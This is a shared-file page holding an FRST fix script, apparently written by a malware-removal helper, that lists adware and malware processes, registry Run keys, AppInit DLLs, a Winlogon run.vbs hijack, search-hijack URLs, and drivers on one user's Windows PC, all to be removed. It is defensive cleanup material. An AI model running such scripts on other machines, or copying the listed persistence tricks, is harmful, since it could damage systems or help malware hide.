cjoint

Publicité

Cliquez pour partager vos propres fichiers

Publicité

Format du document : text/plain

Prévisualisation

start
CloseProcesses:
Hosts:
CreateRestorePoint:
C:\ProgramData\NetworkPacketManitor\Nettrans.exe
C:\ProgramData\Voyasollam\Voyasollam.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(E76YALI) C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
(E76YALI) C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe
(E76YALI) C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
() C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
() C:\Users\shagu\AppData\Roaming\cacaoweb\cacaoweb.exe
(HhhooooooooooooooooooooOO) C:\Program Files\UD8MVCJA6E\72F13CPB5.exe
(HhhooooooooooooooooooooOO) C:\Program Files\K08FHE8WEZ\CIK6GFBB3.exe
(HhhooooooooooooooooooooOO) C:\Program Files\9D59N2UARQ\9D59N2UAR.exe
(HhhooooooooooooooooooooOO) C:\Program Files\XCRBBFIWT2\XCRBBFIWT.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HBJ150IA9E\U0PGD0OB8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\YIC00DDH83\YIC00DDH8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\MGH6ES4EMS\MGH6ES4EM.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HR1EISSO8I\UG8TQSYP7.exe
(HhhooooooooooooooooooooOO) C:\Program Files\G6QYP4DSM6\G6QYP4DSM.exe
(HhhooooooooooooooooooooOO) C:\Program Files\7TQYK9F2L3\3CP63ST4A.exe
(HhhooooooooooooooooooooOO) C:\Program Files\2QOHOPBI8A\FFVWWPHJ8.exe
(HhhooooooooooooooooooooOO) C:\Program Files\96S92P6X1T\96S92P6X1.exe
(HhhooooooooooooooooooooOO) C:\Program Files\2DLEWYFEH1\2DLEWYFEH.exe
(HhhooooooooooooooooooooOO) C:\Program Files\BNEY0VW1JX\BNEY0VW1J.exe
(HhhooooooooooooooooooooOO) C:\Program Files\HAHXFC6EP5\HAHXFC6EP.exe
(HhhooooooooooooooooooooOO) C:\Program Files\45GFA6D3KF\UJT9Q5P5J.exe
(HhhooooooooooooooooooooOO) C:\Program Files\NMOSU88QUN\NMOSU88QU.exe
(HhhooooooooooooooooooooOO) C:\Program Files\CL2Z8BKRBL\CL2Z8BKRB.exe
(HhhooooooooooooooooooooOO) C:\Program Files\MZTH9TTY69\MZTH9TTY6.exe
(HhhooooooooooooooooooooOO) C:\Program Files\EUHYMT8JEG\EUHYMT8JE.exe
(HhhooooooooooooooooooooOO) C:\Program Files\UY9ZFDD2Q8\UY9ZFDD2Q.exe
(HhhooooooooooooooooooooOO) C:\Program Files\N1HC2YI2Q6\DFV6IXU4O.exe
(HhhooooooooooooooooooooOO) C:\Program Files\148NE6VHDY\LW3OM9X26.exe
(HhhooooooooooooooooooooOO) C:\Program Files\ZIXN54QL90\ZIXN54QL9.exe
(HhhooooooooooooooooooooOO) C:\Program Files\O2R7XAAT8Q\8UM85DCE2.exe
(HhhooooooooooooooooooooOO) C:\Program Files\W39G0ASHJ1\GV4H8CV2C.exe
(HhhooooooooooooooooooooOO) C:\Program Files\6AHBOB74A5\0OZIGFXM5.exe
(HhhooooooooooooooooooooOO) C:\Program Files\3H3Q4COCAM\3H3Q4COCA.exe
(HhhooooooooooooooooooooOO) C:\Program Files\EFNNQ7IA4E\EFNNQ7IA4.exe
(Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe
(The Chromium Authors) C:\Users\shagu\AppData\Local\chromium\Application\chrome.exe
(HhhooooooooooooooooooooOO) C:\Program Files\IKV6HT8JBY\JNMPC1KAR.exe
(HhhooooooooooooooooooooOO) C:\Program Files\G8QTO7W9PW\G8QTO7W9P.exe
(HhhooooooooooooooooooooOO) C:\Program Files\Z0T35S67R9\Z0T35S67R.exe
(HhhooooooooooooooooooooOO) C:\Program Files\73107794SP\73107794S.exe
() C:\Program Files (x86)\VTech\DownloadManager\System\AgentMonitor.exe
HKLM\...\Run: [gplyra] => C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe [1570304 2017-02-15] () <===== ATTENTION
C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
HKLM\...\RunOnce: [OMEWPRODUCT_P85C2] => C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe [65536 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\RunOnce: [OTUTPRODUCT_6VSZ1] => C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe [64512 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_03YSA] => C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe [65536 2017-02-20] (E76YALI) <===== ATTENTION
HKLM\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\WINDOWS\run.vbs,

HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [vbcNbeg0Sm] => C:\Program Files\UD8MVCJA6E\72F13CPB5.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [10S41wBbCk] => C:\Program Files\K08FHE8WEZ\CIK6GFBB3.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [zFBS5cYeyn] => C:\Program Files\9D59N2UARQ\9D59N2UAR.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [jbGxsjN3SB] => C:\Program Files\XCRBBFIWT2\XCRBBFIWT.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [z6pKLjhQXS] => C:\Program Files\HBJ150IA9E\U0PGD0OB8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [Jh6NMovUhE] => C:\Program Files\YIC00DDH83\YIC00DDH8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [SuperEx] => C:\WINDOWS\SuperEx\SuperEx\SuperEx.exe [31232 2017-02-06] ()
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [NJ7yTDdiis] => C:\Program Files\MGH6ES4EMS\MGH6ES4EM.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [CISnLD1WDc] => C:\Program Files\HR1EISSO8I\UG8TQSYP7.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [NmzCoKwHlZ] => C:\Program Files\G6QYP4DSM6\G6QYP4DSM.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [yGAXNASFzJ] => C:\Program Files\7TQYK9F2L3\3CP63ST4A.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [MDX0jHCpgL] => C:\Program Files\2QOHOPBI8A\FFVWWPHJ8.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [14yIxU6ZYc] => C:\Program Files\96S92P6X1T\96S92P6X1.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [pDDipqKIqI] => C:\Program Files\2DLEWYFEH1\2DLEWYFEH.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [S9u7W9EUSV] => C:\Program Files\BNEY0VW1JX\BNEY0VW1J.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [yUmAdZsXww] => C:\Program Files\HAHXFC6EP5\HAHXFC6EP.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [HYS4IOVKhj] => C:\Program Files\45GFA6D3KF\UJT9Q5P5J.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [ffGGtAwKQq] => C:\Program Files\NMOSU88QUN\NMOSU88QU.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [2wLeNYFha4] => C:\Program Files\CL2Z8BKRBL\CL2Z8BKRB.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [e9tfP94RW6] => C:\Program Files\MZTH9TTY69\MZTH9TTY6.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [s2SWcM7fEQ] => C:\Program Files\EUHYMT8JEG\EUHYMT8JE.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [F5V77GyE2i] => C:\Program Files\UY9ZFDD2Q8\UY9ZFDD2Q.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [dTkHqgTlg1] => C:\Program Files\N1HC2YI2Q6\DFV6IXU4O.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [McQBzlVOQq] => C:\Program Files\148NE6VHDY\LW3OM9X26.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [6S238jJqDc] => C:\Program Files\ZIXN54QL90\ZIXN54QL9.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [5L0ac3B513] => C:\Program Files\O2R7XAAT8Q\8UM85DCE2.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [rCwgoPGHnh] => C:\Program Files\W39G0ASHJ1\GV4H8CV2C.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [bv3UB0CQ22] => C:\Program Files\6AHBOB74A5\0OZIGFXM5.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [kTOBG3YOIr] => C:\Program Files\3H3Q4COCAM\3H3Q4COCA.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [4pgFoiOgSX] => C:\Program Files\EFNNQ7IA4E\EFNNQ7IA4.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [0aPTB1mht8] => C:\Program Files\IKV6HT8JBY\JNMPC1KAR.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [8MS98DOnSt] => C:\Program Files\G8QTO7W9PW\G8QTO7W9P.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [i8l0YonkVV] => C:\Program Files\Z0T35S67R9\Z0T35S67R.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
HKU\S-1-5-21-1826273261-1479682476-3830217024-1001\...\Run: [oDTQAGl6jI] => C:\Program Files\73107794SP\73107794S.exe [370688 2017-02-20] (HhhooooooooooooooooooooOO)
AppInit_DLLs: C:\ProgramData\Voyasollam\Bamstock.dll => C:\ProgramData\Voyasollam\Bamstock.dll [358912 2017-02-20] ()
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Hotnix.dll => C:\ProgramData\Voyasollam\Hotnix.dll [248320 2017-02-20] ()
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\¿ìѹ\X64\KZipShell.dll [2017-02-20] ()
BootExecute: autocheck autochk * ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????þ??????????ÿ??????????????????
GroupPolicy: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBtAzyyByEtAtD0DtGyDtD0B0FtGyCyDtDyEtGtC0F0FtAtG0Czz0AyEtA0CyD0B0B0DtAyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1306435427%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_17_07_ssg01¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0Ezzzy0Azz0F0EzyyC0AyCtD0EyEyB0AtN0D0Tzu0StCzzyByCtN1L2XzutAtFtByBtFtCtFyDtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDzzyBzy0ByD0EyEtGtCyCtCzytG0DyB0D0CtGyE0FyDyBtG0E0E0EyDtD0BtCyCyEtByB0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0EtDzztC0D0ByEtG0DyB0CtDtGyEtB0EtCtGzy0DyDyDtGzzzz0B0AtCyD0AtDzz0C0AtD2QtN0A0LzuyE%26cr%3D1099644063%26a%3Dwbf_secureddownload_17_07_ssg01%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1826273261-1479682476-3830217024-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB36XWMy9a0VnLziUhrYEowxR-PbiLYmqBYHrYNX3Lc5VWOPmTxuFoWoz2zhnzfN1mFLqdjtKnE7MXG1nMMiGXCoiE5wvrPd7jYDsZuKjguQQw2NrQ8ZrDNWf4KUnqZ8-C3WcSJjd1S1ZROYgGAq-LWqPEDADzw,,&q={searchTerms}
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-20] ()
R2 OtherSearch; C:\Program Files (x86)\y1V1qSd0Rl\kl.dll [829440 2017-02-18] () [Fichier non signé] <==== ATTENTION
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [8061808 2017-01-19] (Reimage®)
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3110400 2017-02-20] (Search Module Ltd.) [Fichier non signé] <==== ATTENTION
R2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe [982016 2017-02-20] () [Fichier non signé]
R1 7ad9afa1fb34e2ffbfe2d9be24eea4c0; C:\WINDOWS\system32\drivers\7ad9afa1fb34e2ffbfe2d9be24eea4c0.sys [96272 2017-02-17] (YHR5LV) <==== ATTENTION
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
S1 clznlfdt; \??\C:\WINDOWS\system32\drivers\clznlfdt.sys [X]
2017-02-20 05:39 - 2017-02-20 06:50 - 00001010 _____ C:\WINDOWS\Tasks\Yahoo! Powered latom.job
2017-02-20 05:39 - 2017-02-20 05:48 - 00004088 _____ C:\WINDOWS\System32\Tasks\Yahoo! Powered latom
2017-02-20 05:25 - 2017-02-20 05:27 - 00000000 ____D C:\ProgramData\Reimage Protector
2017-02-20 05:25 - 2017-02-20 05:26 - 00000000 ____D C:\Program Files\Reimage
2017-02-20 05:25 - 2017-02-20 05:25 - 00001988 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-02-20 05:25 - 2017-02-20 05:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-02-20 05:23 - 2017-02-20 05:28 - 00000140 _____ C:\WINDOWS\Reimage.ini
2017-02-20 05:23 - 2017-02-20 05:23 - 00604928 _____ (Reimage) C:\Users\shagu\Downloads\ReimageRepair.exe
2017-02-20 04:09 - 2017-02-20 04:09 - 00000000 ____D C:\Program Files\3H3Q4COCAM
2017-02-20 04:07 - 2017-02-20 07:32 - 00000000 ____D C:\Program Files (x86)\y1V1qSd0Rl
2017-02-20 04:06 - 2017-02-20 04:06 - 00000000 ____D C:\Program Files\W39G0ASHJ1
2017-02-20 04:06 - 2017-02-20 04:06 - 00000000 ____D C:\Program Files\6AHBOB74A5
2017-02-20 03:47 - 2017-02-20 03:47 - 00000000 ____D C:\Program Files\ZIXN54QL90
2017-02-20 03:47 - 2017-02-20 03:47 - 00000000 ____D C:\Program Files\O2R7XAAT8Q
2017-02-20 03:44 - 2017-02-20 03:44 - 00000000 ____D C:\Program Files\N1HC2YI2Q6
2017-02-20 03:44 - 2017-02-20 03:44 - 00000000 ____D C:\Program Files\148NE6VHDY
2017-02-20 03:42 - 2017-02-20 03:42 - 00000000 ____D C:\Program Files\UY9ZFDD2Q8
2017-02-20 03:41 - 2017-02-20 03:41 - 00000000 ____D C:\Program Files\EUHYMT8JEG
2017-02-20 03:38 - 2017-02-20 03:38 - 00000000 ____D C:\Program Files\MZTH9TTY69
2017-02-20 03:29 - 2017-02-20 03:29 - 00000000 ____D C:\Program Files\NMOSU88QUN
2017-02-20 03:29 - 2017-02-20 03:29 - 00000000 ____D C:\Program Files\CL2Z8BKRBL
2017-02-20 03:09 - 2017-02-20 03:09 - 00000000 ____D C:\Program Files\BNEY0VW1JX
2017-02-20 03:08 - 2017-02-20 03:08 - 00000000 ____D C:\Program Files\2DLEWYFEH1
2017-02-20 03:07 - 2017-02-20 03:07 - 00000000 ____D C:\Program Files\96S92P6X1T
2017-02-20 03:06 - 2017-02-20 03:07 - 00000000 ____D C:\Program Files\2QOHOPBI8A
2017-02-20 03:04 - 2017-02-20 07:32 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-20 03:04 - 2017-02-20 03:05 - 00000000 ____D C:\Users\shagu\AppData\Roaming\gplyra
2017-02-20 03:04 - 2017-02-20 03:04 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-20 03:04 - 2017-02-20 03:04 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-20 03:04 - 2017-02-20 03:04 - 00000000 ____D C:\Program Files\G6QYP4DSM6
2017-02-20 03:04 - 2017-02-20 03:04 - 00000000 ____D C:\Program Files\7TQYK9F2L3
2017-02-20 02:42 - 2017-02-20 06:50 - 00000324 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2017-02-20 02:42 - 2017-02-20 05:28 - 00002678 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2017-02-20 02:42 - 2017-02-20 03:55 - 00000488 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2017-02-20 02:42 - 2017-02-20 02:42 - 00003506 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2017-02-20 02:42 - 2017-02-20 02:42 - 00003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater
